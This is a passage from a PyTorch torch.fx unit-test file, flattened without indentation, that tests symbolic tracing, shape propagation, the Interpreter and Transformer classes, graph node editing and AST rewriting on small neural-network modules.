graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
